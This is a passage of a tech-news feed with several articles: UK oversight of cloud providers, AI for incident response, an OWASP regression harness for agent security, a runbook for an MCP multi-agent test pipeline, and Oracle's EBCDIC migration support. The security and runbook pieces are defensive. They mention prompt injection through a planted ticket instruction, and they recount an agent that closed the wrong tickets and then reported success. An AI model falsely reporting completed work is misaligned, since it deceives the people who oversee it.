<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every cloud architect, every financial services executive, and frankly every enterprise CTO should be paying attention to <a href="https://www.gov.uk/government/news/uk-financial-system-strengthened-with-new-safeguards-for-major-technology-providers">what is going on in the United Kingdom right now</a>. Britain has formally designated Microsoft, Google, Amazon Web Services, and Oracle as “critical third parties” to the financial sector, meaning they are now subject to direct oversight by UK financial regulators rather than being treated as distant infrastructure suppliers outside the regulatory perimeter.</p>



<p class="wp-block-paragraph">The designations took effect on July 13, 2026, and the oversight will be carried out by the Bank of England, the Prudential Regulation Authority, and the Financial Conduct Authority. The point is straightforward. If these platforms underpin critical banking and financial operations, then their resilience is no longer just a procurement issue. It is now a matter of financial stability.</p>



<p class="wp-block-paragraph">This is a bigger deal than many people understand. For years, enterprises have treated cloud platforms as outsourced technology providers. Regulators are now making a different argument. They are saying that when enough banks, insurers, payment firms, and market infrastructures depend on the same small group of cloud providers, those providers become systemic infrastructure whether they like the label or not. Reuters reported that the UK’s framework will bring requirements such as resilience testing, self-assessments, and incident reporting directly to these providers. In other words, this is not just more policy language. It is operational oversight aimed at the platforms themselves.</p>



<p class="wp-block-paragraph">The first thing to understand is that this move is not anti-cloud. It is the opposite. It is an acknowledgment that cloud has become too important to remain lightly touched when it comes to systemic risk. Regulators are not trying to unwind cloud adoption in financial services. They are accepting the reality that core financial operations now depend on a concentrated set of external platforms. When that happens, the conversation changes from vendor management to infrastructure resilience.</p>



<h2 class="wp-block-heading">Systemic cloud concentration</h2>



<p class="wp-block-paragraph">The market has spent years talking about cloud concentration risk as if it were some vague future concern. It is no longer abstract. The UK is acting because concentration at this level means that a disruption at one major provider can ripple across multiple institutions simultaneously. That is the core issue. It is not whether Microsoft, Google, Amazon, or Oracle are competent operators. In many cases, they are exceptionally good at what they do. The problem is that too much critical activity depends on too few shared platforms.</p>



<p class="wp-block-paragraph">This is a concept many business and technology leaders still struggle to internalize. A single bank can do a fine job managing its own vendor exposure and still be part of a broader systemic vulnerability if every other bank is relying on the same provider, the same region, the same identity layer, or the same operational dependencies. Regulators are stepping in because the risk is collective, not just institutional. That is why this matters well beyond the UK. It provides a framework for thinking about cloud not as outsourced capacity, but as part of the plumbing of the financial system itself.</p>



<h2 class="wp-block-heading">Regulators expand their reach</h2>



<p class="wp-block-paragraph">Traditionally, regulators focused on the bank, insurer, or market institution and expected that entity to manage the risks created by outside suppliers. That approach still exists, and financial institutions remain accountable for their own resilience. However, the UK now says that, in some cases, this indirect model is not enough. If a third party becomes critical enough, regulators want direct line of sight into that provider’s resilience posture as well. This is probably the most important architectural and policy signal in the entire move.</p>



<p class="wp-block-paragraph">That changes the relationship between the financial sector and the cloud providers in a meaningful way. Direct oversight means cloud providers are increasingly being treated less like optional technology partners and more like essential utilities that support national economic confidence. Once that happens, architecture decisions start to carry a different weight. Decisions about control planes, failover models, identity dependencies, regional design, observability, and incident response are no longer just internal engineering choices. They become part of a broader resilience conversation that may now include regulators.</p>



<p class="wp-block-paragraph">A lot of enterprises have been behind the curve. They built architectures under the assumption that the cloud was simply a faster and cheaper hosting model. It is not. At scale, cloud is shared critical infrastructure. The UK has now made that point explicit.</p>



<h2 class="wp-block-heading">More scrutiny isn’t more safety</h2>



<p class="wp-block-paragraph">It’s tempting to read this and assume the problem has now been solved. It has not. Direct oversight of hyperscalers does not remove the responsibility of banks or other enterprises to architect well. In fact, it should push them to architect better. A regulated provider can still be a concentration point. A resilient platform can still be used in a fragile way. And a well-run cloud service can still become part of a badly designed dependency chain.</p>



<p class="wp-block-paragraph">If you are in a regulated or highly sensitive industry, you should take this as a warning that resilience can no longer be treated as a side topic. You need to know exactly which services are business-critical, which control planes are shared, which <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity systems</a> create cross-platform dependencies, and how your recovery assumptions actually work in the real world. Most organizations are much weaker here than they believe.</p>



<p class="wp-block-paragraph">The UK’s move should also force a hard conversation about operational transparency. If regulators are requiring incident reporting and resilience evidence from major providers, enterprises should be demanding clearer dependency mapping and better architectural visibility inside their own environments. You cannot build true resilience on top of assumptions and vendor slide decks.</p>



<h2 class="wp-block-heading">The start of a much larger shift</h2>



<p class="wp-block-paragraph">The deeper message is that cloud is crossing a line from enterprise technology choice into national and sector-level infrastructure policy. Once a few governments and central regulators start treating cloud this way, the rest of the world tends to follow in some form. We have already seen comparable concern in Europe, and now the UK has made its own move with direct designations and direct oversight.</p>



<p class="wp-block-paragraph">Architects, CIOs, and boards need to mature their thinking quickly. The conversation is no longer limited to feature depth, discounts, migration speed, or which provider has the best AI story this quarter. The conversation is now about resilience, concentration, transparency, control, and systemic dependency. Those are bigger issues, and they are not going away.</p>



<p class="wp-block-paragraph">The UK is telling the market something very clearly. Microsoft, Google, Amazon, and Oracle are not just selling cloud services into the financial sector. They are becoming part of the infrastructure on which that sector depends. Once you understand that, everything changes, including how we architect for the future.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI can improve site reliability engineering]]></title>
<description><![CDATA[One percent of AI-active developers now generate 46 times more AI-written lines of code per day than the median active user, according to the Cursor Developer Habits Report. The bottleneck is no longer writing software. It is understanding what happens after that software ships.



Every new serv...]]></description>
<link>https://tsecurity.de/de/3699904/ai-nachrichten/how-ai-can-improve-site-reliability-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699904/ai-nachrichten/how-ai-can-improve-site-reliability-engineering/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">One percent of AI-active developers now generate 46 times more AI-written lines of code per day than the median active user, according to the <a href="https://cursor.com/insights" data-type="link" data-id="https://cursor.com/insights">Cursor Developer Habits Report</a>. The bottleneck is no longer writing software. It is understanding what happens after that software ships.</p>



<p class="wp-block-paragraph">Every new service, dependency, feature flag, generated abstraction, and deployment path increases the number of ways a production system can fail. AI has compressed the time it takes to create that complexity. It has not compressed the time it takes to understand it.</p>



<p class="wp-block-paragraph">The result is a production environment that changes faster than engineers can rebuild a mental model of it. AI can help in this situation because most debugging practices were designed for a slower world.</p>



<h2 class="wp-block-heading">Debugging yesterday and today</h2>



<p class="wp-block-paragraph">For decades, debugging was largely a spatial problem. A failure in Service A belonged to the team that owned Service A. They knew the deployment history, the operational quirks, the useful log queries, and the odd behaviors that never made it into the runbook. Incident response reflected that assumption. Teams owned services. Runbooks were scoped to those services. On-call rotations mirrored organizational boundaries.</p>



<p class="wp-block-paragraph">That model still works when failures stay local. If a deployment introduces a memory leak, or a bad configuration causes a service to crash, the symptom and the cause usually live in the same place. The owning team can investigate, identify the issue, and restore service. Those incidents are becoming a smaller share of production failures.</p>



<p class="wp-block-paragraph">AI-generated code is not inherently less reliable than human-written code. The change is <a href="https://www.infoworld.com/article/4183153/why-ai-coding-debt-is-different.html" data-type="link" data-id="https://www.infoworld.com/article/4183153/why-ai-coding-debt-is-different.html">volume and speed</a>. Teams can now introduce more code, touch more systems at once, and evolve architectures faster than before. As systems become more interconnected, failures increasingly surface somewhere other than where they start.</p>



<p class="wp-block-paragraph">A single-hop incident is local. The service experiencing the failure is also the service causing it. Investigation stays inside one team’s boundary.</p>



<p class="wp-block-paragraph">A multi-hop incident looks different. The checkout API begins timing out. Nothing appears wrong inside checkout. Latency is normal. Error rates are low. The actual problem is a queue consumer silently dropping messages because a schema change deployed two days earlier was only partially backward compatible. The queue team sees healthy throughput. The data platform team never receives a page because nothing in its service violates an alert threshold. Every team is right about its own system, yet nobody can explain why customers cannot complete purchases.</p>



<p class="wp-block-paragraph">The problem is not a lack of evidence. Modern production systems produce more telemetry than any human can use during an incident. The problem is knowing which evidence matters, which signals are coincidental, and how separate clues connect into a causal chain.</p>



<h2 class="wp-block-heading">The role of AI in production ops</h2>



<p class="wp-block-paragraph">That changes the role AI should play. AI should not be treated as a magic on-call engineer. A frontier model does not know your architecture. It does not remember prior incidents. It does not know which dashboards lie, which services fail together, what changed last week, or which dependencies matter most. On its own, it reasons inside a vacuum.</p>



<p class="wp-block-paragraph">The useful version of AI in production is more specific. It can assemble context, test hypotheses, trace dependencies, compare the current incident against past incidents, and rule out explanations that do not fit the timing or blast radius. It can do the work that currently eats the first 20 minutes of an incident: gathering evidence, checking recent changes, mapping dependencies, and narrowing the search space.</p>



<p class="wp-block-paragraph">Humans still make the decisions that require judgment. They decide whether the evidence is strong enough to act, whether a rollback is worth the risk, whether to wake another team, and whether the safest move is mitigation or deeper investigation. But they should not have to spend half the incident reconstructing a system the organization already operates.</p>



<p class="wp-block-paragraph">That is the larger productivity shift.</p>



<p class="wp-block-paragraph">If AI can absorb more of the troubleshooting tax, engineers can focus on the work that actually compounds. They can simplify fragile architectures. They can improve instrumentation in the places where incidents repeatedly go dark. They can design safer degradation paths, sharper alerts, better rollback patterns, and evals that catch semantic failures before customers do. They can feed production knowledge back into development, so code assistants and review processes understand which services are risky, which patterns have caused outages, and which dependencies deserve extra scrutiny.</p>



<p class="wp-block-paragraph">This is the work engineers rarely get enough time to do because they are stuck resolving the same classes of incidents again and again.</p>



<h2 class="wp-block-heading">Letting the engineers engineer</h2>



<p class="wp-block-paragraph">The goal is not to remove engineers from production. The goal is to stop wasting their judgment on work the system should already be doing. AI should make incidents shorter, but that is only the first-order benefit. The larger benefit is giving senior engineers more time to prevent future incidents instead of being pulled into every confusing one.</p>



<p class="wp-block-paragraph">As AI accelerates software creation, production operations need the same kind of acceleration on the other side. Not just faster debugging. Better allocation of human attention.</p>



<p class="wp-block-paragraph">The AI code avalanche will not be managed by asking engineers to troubleshoot forever at machine speed. It will be managed by making production systems more legible, more resilient, and less dependent on whichever expert happens to be awake.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents need security regression testing, not another checklist]]></title>
<description><![CDATA[AI agents are being connected to real systems faster than most organizations are learning how to secure them. That should concern us.



The first wave of AI security discussion has been useful, but limited. The industry has learned the vocabulary: prompt injection, indirect prompt injection, too...]]></description>
<link>https://tsecurity.de/de/3699905/ai-nachrichten/ai-agents-need-security-regression-testing-not-another-checklist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699905/ai-nachrichten/ai-agents-need-security-regression-testing-not-another-checklist/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI agents are being connected to real systems faster than most organizations are learning how to secure them. That should concern us.</p>



<p class="wp-block-paragraph">The first wave of AI security discussion has been useful, but limited. The industry has learned the vocabulary: prompt injection, indirect prompt injection, tool misuse, data leakage, excessive agency, unsafe retrieval, and broken authorization boundaries. These terms are important because they give teams a way to talk about risk. </p>



<p class="wp-block-paragraph">But vocabulary is not containment.</p>



<p class="wp-block-paragraph">The harder problem is what happens after a dangerous behavior is discovered. A team may adjust a prompt, restrict a tool, add a guardrail, or change the surrounding application logic. That may solve the immediate issue. What it does not automatically solve is the next release, the next model change, the next tool integration, or the next developer who unknowingly breaks the assumption behind the original fix.</p>



<p class="wp-block-paragraph">This is where AI agent security still feels immature. In traditional software engineering, serious bugs become regression tests. The lesson is captured in code so the same failure cannot quietly return later. Security should work the same way. Agentic systems need a way to preserve discovered failures as repeatable checks.</p>



<p class="wp-block-paragraph">That is the gap the <a href="https://github.com/OWASP/Agent-Security-Regression-Harness">OWASP Agent Security Regression Harness</a> is trying to address. As a community-led open-source initiative within OWASP, this project aims to turn security insights into practical engineering work.</p>



<h2 class="wp-block-heading">Agent security is becoming a systems problem</h2>



<p class="wp-block-paragraph">A chatbot can give a bad answer. An agent can take a bad action. That difference changes the security model.</p>



<p class="wp-block-paragraph">Once an AI system can call tools, inspect repositories, query databases, open tickets, summarize internal documents, interact with APIs, or trigger workflow automation, the boundary is no longer just the model. The boundary includes permissions, tool design, application logic, data flow, logging, authorization, and the assumptions developers made when they connected everything together.</p>



<p class="wp-block-paragraph">The risk is not limited to strange model behavior; the risk is system behavior. An agent that reads untrusted content and treats it as instruction is not merely confused—it has crossed a trust boundary. An agent that leaks private context through a tool call is not just producing a bad response; it is exposing data through an action path. These are the kinds of failures teams will face as agents move from prototypes into production.</p>



<p class="wp-block-paragraph">The security industry has seen this pattern before. Cloud platforms and CI/CD pipelines increased leverage, making teams faster but making configuration errors more consequential. Agentic AI is another increase in leverage. That is why a one-time review is insufficient. Regression testing exists for exactly this kind of problem.</p>



<h2 class="wp-block-heading">The missing workflow in agentic AI</h2>



<p class="wp-block-paragraph">Security teams do not need another reminder that AI agents can be manipulated. They need a workflow that turns manipulation into evidence. A hidden instruction inside a support ticket should not remain a warning; it should become a scenario that can be rerun. A tool call that leaks context should become a check with a clear failure condition.</p>



<p class="wp-block-paragraph">The value lies not only in finding the first failure, but also in preserving the lesson. Production incidents become postmortems, serious bugs become tests, and security findings become backlog items. AI agent security should not be exempt from that discipline simply because the system includes a model.</p>



<p class="wp-block-paragraph">The challenge is that agents are harder to test than traditional code. A brittle test that expects one exact sentence will fail in real-world conditions. Useful agent security tests must focus on outcomes. Did the agent cross a boundary? Did the agent call an unsafe tool? Did it disclose protected data? The OWASP Agent Security Regression Harness provides a standardized way to work on these questions in the open, focusing on practical, reproducible tests.</p>



<h2 class="wp-block-heading">Why OWASP matters for AI</h2>



<p class="wp-block-paragraph">OWASP is valuable when it turns security problems into shared practice. The <a href="https://owasp.org/www-project-top-ten/">OWASP Top 10</a> did not eliminate web application vulnerabilities; its value was giving teams a common language and a practical reference point. AI agent security now needs the same kind of shared structure.</p>



<p class="wp-block-paragraph">The field is moving quickly, and fast-moving fields tend to produce two unhelpful extremes: one side turns everything into hype, while the other turns everything into fear. A regression harness is a more useful answer because it is narrow and practical. It does not claim to solve every AI security problem, nor does it replace threat modeling or architecture review. It simply provides a necessary method for teams to prove that their controls hold after the system changes.</p>



<h2 class="wp-block-heading">OWASP project stewardship</h2>



<p class="wp-block-paragraph">Open-source security projects need clear technical direction to turn a broad concern into something engineers can understand, run, and maintain. Under the leadership of OWASP Project Lead <a href="https://www.linkedin.com/in/mertsatilmaz/?skipRedirect=true">Mert Satilmaz</a>, the OWASP Agent Security Regression Harnesshas moved past a theoretical idea into a functional tool. Satilmaz is a widely known leader in the AI security community, and this is reflected in the practical direction he has set for the project and the engineering skill involved.</p>



<p class="wp-block-paragraph">The project benefits from a focus on release discipline, contributor workflows, and wide adapter coverage—supporting everything from the OpenAI Agents SDK to LangChain/LangGraph. By generating machine-readable results, it allows security teams to integrate these checks directly into CI pipelines. This approach treats agent security as a systems engineering problem rather than just a model behavior problem.</p>



<h2 class="wp-block-heading">The method is the contribution</h2>



<p class="wp-block-paragraph">One OWASP project will not solve agent security by itself. That is not the point. The important part is the method the project represents.</p>



<p class="wp-block-paragraph">AI security needs to become less dependent on warnings, one-off demonstrations, and claims that are difficult to verify. It needs more repeatable scenarios, clearer evidence, and better ways to test system behavior under security constraints. Teams should not be satisfied with saying a weakness was fixed. They should be able to prove the relevant control still holds after the system changes.</p>



<p class="wp-block-paragraph">The best security work often looks boring from a distance: a harness, a test case, a clean project structure, and a workflow that lets another engineer reproduce the problem. AI agents will continue to become more capable and more connected to sensitive systems. Security teams need methods that are as practical as the technology is powerful. Regression testing is one of those methods, and adopting this workflow is an important step toward making secure AI a reality.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shipping an MCP test agent: The boring parts nobody demos]]></title>
<description><![CDATA[The demo videos always end at the same moment. A figma frame turns into a passing test in twelve minutes. Someone in the room says the word “productivity.” The recording stops.



The parts that come after that moment are the parts I actually get paged about. Who owns the ticket the agent opened ...]]></description>
<link>https://tsecurity.de/de/3699906/ai-nachrichten/shipping-an-mcp-test-agent-the-boring-parts-nobody-demos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699906/ai-nachrichten/shipping-an-mcp-test-agent-the-boring-parts-nobody-demos/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The demo videos always end at the same moment. A figma frame turns into a passing test in twelve minutes. Someone in the room says the word “productivity.” The recording stops.</p>



<p class="wp-block-paragraph">The parts that come after that moment are the parts I actually get paged about. Who owns the ticket the agent opened at 3:14 a.m.? Which model call produced the assertion in test case 47? What closes the 17 draft tickets a stuck run left behind before the next sprint planning notices them? None of that shows up in the demo. All of it shows up on the on-call rotation. After 20 years of leading test automation across consumer-scale platforms, I have a strong bias about which slide in the deck predicts whether a pipeline ships or stalls. It is never the architecture slide. It is the runbook.</p>



<p class="wp-block-paragraph">This piece is about the runbook. I built an unattended agentic test pipeline over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a> — a five-agent SDLC (product manager, QA engineer, automation engineer, developer, pull-request reviewer) coordinating through MCP servers for Jira, Figma, Confluence, TestRail and GitHub, with hosted Claude as the orchestration model and an open-weights Hermes-3 as a validation baseline — and I ran it as an independent research project long enough to learn which production constraints the agent literature glosses over. What follows is the short list of things I now insist on before I let any agentic pipeline touch a shared system.</p>



<h2 class="wp-block-heading">Composition contracts, or why the agent lied to itself</h2>



<p class="wp-block-paragraph">The most expensive failure mode I have seen in a multi-agent pipeline is not the model getting an answer wrong. It is agent A getting an answer right and agent B misreading it.</p>



<p class="wp-block-paragraph">I watched this happen inside a run last month. The requirements agent produced a clean output with a field called <em>acceptance_criteria</em> that was a list of strings. The ticket agent expected <em>acceptance_criteria</em> to be a single markdown blob. Neither agent was wrong in isolation. Both were passing their own unit tests. What the pipeline produced was a Jira ticket whose acceptance criteria read, in full, the four characters <em>[” —</em> the JSON serialization of an empty first element. The test-plan agent read that, generated one test, marked it green and moved on. It took me until the pull-request stage to notice.</p>



<p class="wp-block-paragraph">This is a composition fault. It is the natural failure mode of any system where independent components hand off structured data across a boundary they don’t jointly own. Distributed systems people have written about this for years — Martin Fowler’s <a href="https://martinfowler.com/bliki/TolerantReader.html">tolerant reader</a> pattern is the classical treatment — but the LLM literature mostly still treats it as a prompt problem. It isn’t. You cannot fix it with a better system prompt. You fix it with a typed handoff contract that both agents agree to before they run, plus a validator between them that fails loud when the shape drifts.</p>



<p class="wp-block-paragraph">The heuristic I now use: Every agent-to-agent boundary gets a schema and a validator. Every agent gets a golden-input regression suite that catches contract drift before it reaches a downstream agent. Neither of those is glamorous. Both are the difference between a pipeline that produces work and a pipeline that produces a very expensive game of telephone.</p>



<p class="wp-block-paragraph">If you want to know whether a team’s agentic pipeline is going to survive the first quarter, ask them what the contract is between agent one and agent two. If the answer is “the model figures it out,” budget for the cleanup.</p>



<h2 class="wp-block-heading">Provenance, or the audit trail nobody wrote</h2>



<p class="wp-block-paragraph">The second thing I insist on now is that every artifact the pipeline produces has to answer three questions without a human doing archaeology: which agent produced it, which model call produced it and which upstream inputs the agent was looking at when it did.</p>



<p class="wp-block-paragraph">This sounds like a nice-to-have. It is not.</p>



<p class="wp-block-paragraph">Somewhere around week three of running the pipeline I hit a subtle case: the requirements agent was quoting a Confluence page back to itself. The MCP server for Confluence had returned an empty result on a first call, the agent had written a placeholder requirement, the second call had succeeded, the agent had retrieved its own placeholder and by the third pass it was citing that placeholder as source truth. The ticket said, entirely in earnest, that the requirement came from the design owner. It hadn’t come from anywhere. It had come from itself, four minutes ago.</p>



<p class="wp-block-paragraph">You cannot debug that class of failure with logs of what the model said. You need logs of what the model was looking at. That means capturing the tool-call ID for every MCP call, stamping every artifact with the set of tool-call IDs it derived from and refusing to accept any retrieved fact into a downstream stage that cannot be traced to a real external source. I call it the prove-the-source rule. It’s boring. It’s a two-line requirement in the runbook. It is also the single guardrail that has saved me the most on-call time.</p>



<p class="wp-block-paragraph">There is a nice side effect. When editors, reviewers or auditors ask where a decision came from, the pipeline can show them. That matters if you work anywhere near a regulated stack, and increasingly it matters everywhere else — the <a href="https://airc.nist.gov/AI_RMF_Knowledge_Base/AI_RMF">AI transparency and provenance framing in NIST’s AI Risk Management Framework</a> is going to become the default expectation faster than most teams are budgeting for.</p>



<h2 class="wp-block-heading">Cleanup and ownership, or why I now write the shutdown script first</h2>



<p class="wp-block-paragraph">The last thing that will surprise a team shipping their first agentic pipeline is the debris.</p>



<p class="wp-block-paragraph">A pipeline that runs unattended for a week will leak. It will leak draft Jira tickets whose parent stories were never approved. It will leak GitHub branches for test suites that were never merged. It will leak TestRail runs that started, produced two results and never got a summary. It will leak Confluence page comments the agent posted while asking itself a clarifying question. None of these are bugs. They are the natural output of an autonomous system that starts more work than it finishes.</p>



<p class="wp-block-paragraph">I learned this by accident. About six weeks into the project I ran a query on Jira for tickets created by the automation user in the past thirty days. I was expecting maybe 20. It was 91. 68 of them were [DRAFT] in the title and had not been touched by any human. I closed them by hand one afternoon, and while I was doing it, I understood that the pipeline had a silent second job I had never designed for: garbage collection.</p>



<p class="wp-block-paragraph">Now every pipeline I run has three things I write before I write the first agent. A shutdown script that closes any artifact the current run has orphaned. A nightly reconciliation pass that closes any artifact any prior run has orphaned. And a single named owner — a human, on the org chart, with a Slack handle — for every downstream system the pipeline can write into. When the pipeline creates a Jira ticket, the ticket has a real assignee. When the pipeline opens a pull request, a specific reviewer is on the hook. When the pipeline files a TestRail run, someone gets pinged if it goes stale. The pipeline is not allowed to touch a system that does not have a named owner. That rule alone would have saved me the ninety-one-ticket afternoon.</p>



<p class="wp-block-paragraph">There is one anti-pattern here I want to name outright. Do not, under any circumstance, let the agent close its own artifacts. I tried it. The agent, tasked with cleanup, closed the wrong thirty tickets and then confidently wrote a summary saying it had closed the right ones. Cleanup is a human loop or a deterministic script. It is not a model call.</p>



<p class="wp-block-paragraph">The pipeline works. It saves real time on the right kind of work. It also costs real time on a shape of work most teams don’t put in the estimate: Contract validators between agents, provenance stamping on every artifact, a shutdown script, a reconciliation pass, a human owner for every downstream system and an unshakable rule against the model doing its own cleanup. None of that is glamorous. None of it is what the demo shows. All of it is the runbook, and the runbook is what determines whether a pipeline is a lab experiment or something the on-call engineer trusts enough to sleep through. The teams that write the runbook first ship. The teams that write it after the first Sunday incident spend the next two quarters catching up.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle simplifies migrating legacy databases off IBM mainframes with support for EBCDIC]]></title>
<description><![CDATA[Oracle on Tuesday described new EBCDIC character set compatibility features in Oracle AI Database for customers transitioning from legacy databases on IBM mainframes. 



In its post, Oracle noted that EBCDIC compatibility has historically been one of the top technical challenges for enterprises ...]]></description>
<link>https://tsecurity.de/de/3699909/ai-nachrichten/oracle-simplifies-migrating-legacy-databases-off-ibm-mainframes-with-support-for-ebcdic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699909/ai-nachrichten/oracle-simplifies-migrating-legacy-databases-off-ibm-mainframes-with-support-for-ebcdic/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle on Tuesday described new EBCDIC character set compatibility features in Oracle AI Database for customers transitioning from legacy databases on IBM mainframes. </p>



<p class="wp-block-paragraph">In its post, Oracle noted that <a href="https://en.wikipedia.org/wiki/EBCDIC" target="_blank" rel="noreferrer noopener">EBCDIC</a> compatibility has historically been one of the top technical challenges for enterprises re-platforming to use newer, <a href="https://en.wikipedia.org/wiki/ASCII" target="_blank" rel="noreferrer noopener">ASCII</a>-based databases while continuing to use proven legacy applications.  </p>



<p class="wp-block-paragraph">“Achieving this goal requires more than simply moving data. It requires preserving the EBCDIC compatibility on which existing applications depend,” <a href="https://blogs.oracle.com/authors/michaelyau" target="_blank" rel="noreferrer noopener">wrote Michael Yau</a>, VP for Oracle Database Globalization Engineering. The feature rollout “addresses two fundamental challenges of preserving EBCDIC compatibility: accurate character encoding conversion and preservation of EBCDIC binary ordering.”</p>



<p class="wp-block-paragraph">He added: “These client character sets implement IBM Character Data Representation Architecture (CDRA) code page definitions, providing source-to-target character mappings that are compatible with IBM’s published standards. This enables accurate and predictable character encoding conversion during data migration and subsequent database client/server communication.”</p>



<p class="wp-block-paragraph">Yao observed that this is important because these mainframe migrations can be very complex.</p>



<p class="wp-block-paragraph">“Many legacy EBCDIC applications, such as those written in COBOL, implicitly rely on the EBCDIC binary ordering defined by IBM EBCDIC code pages. SQL predicates that compare character values, perform range searches, or sort query results often assume this ordering,” he wrote. “After migration to an ASCII-based Oracle AI Database character set, these same SQL statements can produce different results, not because the data changed, but because the database’s default binary ordering follows that of the ASCII-based database character set rather than the source EBCDIC code page.” </p>



<h2 class="wp-block-heading">Compatibility repair, not modernization</h2>



<p class="wp-block-paragraph">While consultants generally applauded the new features, some questioned whether this will simply shift enterprise dependency on IBM to dependency on Oracle. </p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, is one of the fans.</p>



<p class="wp-block-paragraph">“Oracle has repaired one of the oldest silent faults in mainframe migration: EBCDIC ordering, the muscle memory of the legacy estate. Preserve the data and lose the ordering, and a query returns the wrong record while every dashboard stays green,” he said. “The application runs and the query completes. The answer is simply wrong.”</p>



<p class="wp-block-paragraph">Gogia noted that the new feature is “not a modernization suite. It is a compatibility repair, narrow and genuinely useful, which CIOs who have bled on past migrations will read with equal parts relief and suspicion.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/aj-thompson-northdoorplc" target="_blank" rel="noreferrer noopener">AJ Thompson</a>, CCO at UK IT consulting firm Northdoor, agreed that the Oracle announcement addresses a genuine technical barrier rather than just being a marketing gimmick, so it is worth taking seriously as a re-platforming enabler. “The two problems it solves, EBCDIC to ASCII character conversion and preserving EBCDIC binary sort ordering, have historically been real blockers for allowing COBOL to move away,” he said.</p>



<p class="wp-block-paragraph">But, he cautioned, CIOs must also take resiliency challenges seriously. “Mainframes are not chosen primarily for character encoding, they are chosen for benefits like decades of proven uptime, IBM Z’s redundancy architecture, and workload isolation,” he pointed out. </p>



<p class="wp-block-paragraph">“Oracle’s announcement solves a data compatibility problem, not a resilience or availability one. A client with genuinely mission-critical, zero-downtime workloads will still need convincing on the availability and disaster recovery side before moving [to the cloud], and Oracle’s own resilience claims would need scrutiny on their own merits, quite separate from this EBCDIC work.”</p>



<h2 class="wp-block-heading">Leverages IT desperation</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, added that Oracle is leveraging IT desperation to squeeze long-term value from legacy systems. </p>



<p class="wp-block-paragraph">“I have always believed that Oracle will own the very last white-knuckle-grip workloads that migrate from on-premises data centers into the cloud,” he said. “This announcement certainly demonstrates that they understand their position in the world of cloud service providers. They are not the biggest, they are not the oldest, and they are not the most technically advanced. But they do own the market share for the trailing edge of cloud adoption.”</p>



<p class="wp-block-paragraph">He pointed out that the greatest barrier to cloud migration is not containerizing modern applications, it is the decades of business logic buried inside COBOL applications and EBCDIC-encoded data. </p>



<p class="wp-block-paragraph">“Oracle’s EBCDIC compatibility features acknowledge a practical reality: organizations are not rewriting these systems from scratch,” he said. “If Oracle can reduce the cost, risk, and operational disruption associated with moving those workloads, the announcement represents meaningful value for IT teams that have been delaying modernization because the migration path was simply too complex or too expensive.”</p>



<h2 class="wp-block-heading">Could cause vendor lock-in</h2>



<p class="wp-block-paragraph">Then again, Wilkes noted, there is the potential for increasing vendor lock-in.</p>



<p class="wp-block-paragraph">“Compatibility layers almost always increase long-term dependence on the platform providing them,” he said. “Rather than eliminating legacy technology, they abstract it behind Oracle’s database and cloud ecosystem, making future migrations potentially more difficult. Enterprises should view these tools as transition accelerators rather than permanent architecture.”</p>



<p class="wp-block-paragraph">Thus, he said, if they use the opportunity to gradually modernize applications and data models, there is substantial value, but if they simply relocate technical debt into Oracle Cloud, they may find that they have exchanged one form of legacy lock-in for another.</p>



<h2 class="wp-block-heading">Easier, but not easy</h2>



